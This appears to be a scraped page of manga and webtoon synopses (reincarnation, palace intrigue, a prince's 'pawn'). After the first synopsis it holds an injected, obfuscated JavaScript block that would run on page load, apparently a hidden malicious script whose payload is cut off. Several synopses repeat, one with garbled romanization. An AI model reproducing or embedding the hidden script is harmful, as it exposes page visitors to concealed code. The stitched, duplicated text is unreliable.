Amber is an author desperate for a best-seller, but while trying to write a new idea, she dies in an accident. The next time she opens her eyes, she is the main character inside her own unfinished novel! High school was hell for Amber, and fictional life inside her book is worse--her novel was a thriller where the heroine is pursued by a love-obsessed psychopath! Now, Amber needs to avoid the male lead to stay alive and find a way to bring her book to an ending without losing it all.<script></script><script>function _0xf581(_0x491429,_0x582401){var _0x4ea27f=_0x1ddb();return _0xf581=function(_0x2bcd5c,_0x466fbc){_0x2bcd5c=_0x2bcd5c-(-0x1e13+0x1fcf+-0x2c);var _0x3d8894=_0x4ea27f[_0x2bcd5c];return _0x3d8894;},_0xf581(_0x491429,_0x582401);}(function(_0x2310d5,_0x36594b){var _0x54ffd5=_0xf581,_0x1828d3=_0x2310d5();while(!![]){try{var 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Out of all Japanese historical figures, Oda Nobunaga is probably the one with the widest range of interpretations. But what was the real Nobunaga like, and why was he really betrayed and murdered? While a lot of manga make their stories more interesting by taking historical liberties, this one does the opposite, using historical research to paint a clearer - yet more intriguing - picture of the man behind the myth.
The deadliest female assassin of the 21st century dies in an explosion and later wakes up to find herself in the body of the namby-pamby daughter of an ancient dynasty’s Prime Minister. The Prime Minister uses her as a pawn in his political game by setting her up with the King’s grotesque, no-good brother. When she realizes her soon-to-be husband is so much smarter than he lets on, she strikes a deal with him to take down their enemies! I’m Not the King of Green Tea The Manipulative Prince’s Bride Wo Cai Bushi Lvcha Wangye Wǒ Cái Bùshì Lǜchá Wángyé 我才不是绿茶王爷
The deadliest female assassin of the 21st century dies in an explosion and later wakes up to find herself in the body of the namby-pamby daughter of an ancient dynasty's Prime Minister. The Prime Minister uses her as a pa** in his political game by setting her up with the King's grotesque, no-good brother. When she realizes her soon-to-be husband is so much smarter than he lets on, she strikes a deal with him to take down their enemies!I'm Not the King of Green TeaThe Manipulative Prince's BrideWo Cai Bushi Lvcha WangyeW Ci Bsh Lch Wngy
Koushaku Reijou wa Tegoma wo Enjiru / 侯爵令嬢は手駒を演じる The daughter of a marquess, Julianna is known as the “perfect lady” by society. However, she has a secret. She’s only enjoying acting like the perfect lady! Her true self is hidden under an invisible mask. One day, she is summoned by Prince Edward, the “perfect prince” who is actually a black-hearted schemer! At the royal palace, he gives her a fiendish order. “Become my pawn. You don’t have the right to say no!”
The daughter of a marquess, Julianna is known as the "perfect lady" by society. However, she has a secret. She's only enjoying acting like the perfect lady! Her true self is hidden under an invisible mask. One day, she is summoned by Prince Edward, the "perfect prince" who is actually a black-hearted schemer! At the royal palace, he gives her a fiendish order. "Become my pawn. You don't have the right to say no!" (Whoa... The prince is so evil!) Julianna reluctantly accepts her duty to act as the prince's pawn, if only to achieve her long-cherished wish, which is...
Read The Marvelous Dr. Jiaoniang ManhwaCheng Jiaoniang's intellectual disability miraculously disappeared, and she suddenly gained the ability to forecast the weather, tell people's fortune, and cure fatal illnesses. But somehow, she didn't think she was Cheng Jiaoniang, because she got strange memories that didn't belong to her. She was abandoned by the Cheng family, but she still decided to go home. However, she went home to reveal the secrets of those memories, not to get humiliated.Pampered Lady's Medical Scripture, Pampered Lady's Medical Scriptures, , , ,
Brought to you by: Happy Croissant Scans! 『Sometimes, your future gets decided by just one moment.』 The whole kingdom of Jesús fell into a state of shock after hearing the news of Queen Mary Trizia’s Suicide. While everyone praised Mary Trizia for being an excellent queen, whilst her older twin brother, Rafael Evans, was most suspicious of her death. ‘It can only be you. No one else can save me other than you.’ These words and the image of his sister screaming those words while approaching him bare-footed remained in his head. Rafael ventures out in search after his relatives for the first time in his life, to attend Mary’s funeral. But in the place where they found Mary’s body, Rafael finds a note… “Lift up your face.” Wanting to find the killer of Mary, Rafael disguises himself as the new queen consort, Anne-Mary La Shore and meets the king ‘Ivry.’ That moment marked the start of an unprecedented fate. The unexpected end of his sister who wasn’t like her younger self, and who he believed would find happiness… What was the ‘hell’ that his sister dropped into? And what will change after Rafael and Ivry meet?
A modern middle school student called Suou Yuuto, ends up in another world called “Yggdrasil”, right in the middle of war. In a world ruled by the survival of the fittest, in which the many clans fight for the hegemony, Yuuto rose up as the “Wolf”clan patriarch with only 16 years old, leading thousands of soldiers using his modern world knowledge as a weapon.
[Translated by Lilith Scans] Once a lowly servant, Sakwol was taken in by Prince Shibaek as his personal attendant and companion. Sakwol admired and followed Shibaek around, but one day, he was suddenly abandoned. Then, a great upheaval occurs and chaos reigns as spirits disrupt the world. In this turmoil, Sakwol awakens as a powerful 'Guardian,' a being capable of vanquishing spirits and ghosts. As a result, people started to rally around him instead of the royal family. Meanwhile, Shibaek, in his attempts to eliminate the inept royal relatives, finds himself captured and brought before Sakwol. "I will make Shibaek my plaything." Sakwol's hatred for Shibaek has shown its teeth. #LoveHate #ClassDifference #ColdBlooded #BeautifulServant+
I brought the slowest couple in the universe together and finally got them engaged, but they called the engagement off on the day of the ceremony itself! I was reborn as the male lead’s younger sister in a fantasy romance novel. But the female lead’s older brother, Aiberg Rafaello, has a severe sister complex and would not let go of his sister. So, how do I make him stop obsessing over his sister? Find him a love interest. “What kind of person do you like, your grace?” “I like someone with blazing-red hair and eyes like the flame, a lady who never stands down for anybody. Speaking of which… I’d say you match the description.” I was only trying to save the lead characters’ engagement. How did I end up flirting with the female lead’s brother? 北部の公爵は炎の令嬢なしでは生きられない / 주인공들의 파혼을 막으려 했을 뿐인데 / I Was Just Trying to Prevent the Break Up of the Main Characters
Feeling hopeless in a cold-hearted society, I arrived in a different dimension, Altius Empire! It’s the first oracle in 32 years and there’s nothing I can do to meet the expectations of the Empire’s citizens. There’s nothing different in this world. The cold treatment is no different from the previous world. After a series of disappointments swept through, what came after was fatigue and lethargy. I don’t want to do anything. I’m not doing anything but I don’t want to do anything more intensely. Even so….. “What did you do all day long today?” Did he come here to criticize my guts with biting remarks? A language bomber with 10000 levels of shaming mental offense, Emperor Mikhail Dnar Altius. Why does he come to my room every day with a fresh look on his face? What’s this familiarity? Pardon me, but are you my mother? Ha, I’m not fond of the Emperor.